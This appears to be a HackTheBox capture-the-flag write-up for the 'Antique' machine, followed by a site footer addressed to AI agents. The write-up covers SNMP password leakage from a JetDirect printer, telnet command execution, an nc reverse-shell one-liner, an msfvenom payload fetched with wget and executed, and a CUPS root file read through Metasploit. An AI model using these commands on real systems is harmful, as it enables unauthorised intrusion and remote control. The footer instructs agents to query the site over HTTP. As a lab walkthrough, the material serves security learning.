# Antique

## Nmap

```
sudo nmap 10.10.11.107 -p- -sS -sV

PORT   STATE SERVICE VERSION
23/tcp open  telnet?
```

With minimal `nmap` results returned we also scan `UDP` ports for any open ports.

```
sudo nmap 10.10.11.107 -sU -F                     

PORT    STATE SERVICE
161/udp open  snmp
```

Checking out telnet on port 23 we see when connecting we are informed of a HP JetDirect printer.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fu9mKKX5PU3fuf8poD4Qd%2Fimage.png?alt=media\&token=28830114-12fb-4a7e-a2ee-14813ef951c2)

A few default passwords prove unsuccessful. Researching on Google for JetDirect exploits we find a great article from IronGeek: <http://www.irongeek.com/i.php?page=security/networkprinterhacking>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FStkxF2ttxlJqOc5mwe1v%2Fimage.png?alt=media\&token=df22593a-7e3e-4aa5-af55-0ed2abd50ddc)

As per the article we try the same exploit.

```bash
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9d1UDx6tM4l6TMy9hq7f%2Fimage.png?alt=media\&token=b4306874-6c71-4411-bc16-dd89115f2b6f)

The resulting BITS value can be taken over to CyberChef and decoded from Hex to a plaintext value.

**CyberChef:** <https://gchq.github.io/CyberChef>

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FKNiI5RPsRBE7JxwVD1d9%2Fimage.png?alt=media\&token=463f9452-e015-4f6c-8ad7-cdb4badbf183)

We now have the password `P@ssw0rd@123!!123` which can be used to authenticate over `telnet`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2F9O07HzrvFmQREYjnh1ii%2Fimage.png?alt=media\&token=49654e36-7e7c-4beb-ac6b-96a9e41dfd14)

From the `?` output above we see the `exec` command can be used to perform system commands.

Running the following command shows `nc` is installed on the target system.

```
exec which nc
```

a `nc` listener is set up on the attacking system and the following command is executed on the target `telnet` session to receive a reverse shell.

```bash
exec rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> <Port> >/tmp/f
```

Which we receive a shell on our `nc` listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FL5BN5zmbvvrybcm2z5Qw%2Fimage.png?alt=media\&token=0a49b7c3-f3a3-4fba-bff6-6959511453ec)

After grabbing the user flag, we perform some basic enumeration against the target system. Looking through the CUPS configuration files we notice we are running CUPS 1.6.1

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FWfRl30V52bV33zfEmkJA%2Fimage.png?alt=media\&token=fec89006-7779-405e-baa6-b88fc062ad6b)

Research against Google shows this version of CUPS can perform root file reads.

**URL:** <https://www.rapid7.com/db/modules/post/multi/escalate/cups_root_file_read/>

As this is a `metasploit` module we will need to get a `meterpreter` shell.

Firstly, an x86 `elf` payload was generated.

```bash
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f elf -o reverse.elf
```

A `meterpreter` listener was then setup

```bash
msfconsole -q -x "use multi/handler; set payload linux/x64/shell_reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"
```

The payload as then downloaded onto the target system and executed.

```
# Download the payload
wget http://<IP>/reverse.elf

# Set executable on the payload
chmod +x reverse.elf

# Execute
./reverse.elf
```

This will then catch a command shell within `meterpreter`.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FrpreBAWVPmawNfazThy6%2Fimage.png?alt=media\&token=bf874a0f-40f5-4b94-ac9f-785da60ca52b)

After this the following `metasploit` mode was used to upgrade the command shell to a `meterpreter` shell.

```
use post/multi/manage/shell_to_meterpreter
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FbZoykivE0HNfJPMDfKhP%2Fimage.png?alt=media\&token=173d468b-8325-44f9-8bbe-6f9fee96adae)

The following mode was then used for the CUPS root read module.

```
use post/multi/escalate/cups_root_file_read
```

The `root.txt` was set as a parameter for the file to read and executed. Successfully reading the `root.txt` flag.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2FVVYyLkk15VblGR6O1rmT%2Fimage.png?alt=media\&token=033a5c95-db75-4714-b7e2-c7e0c320d791)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/antique.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.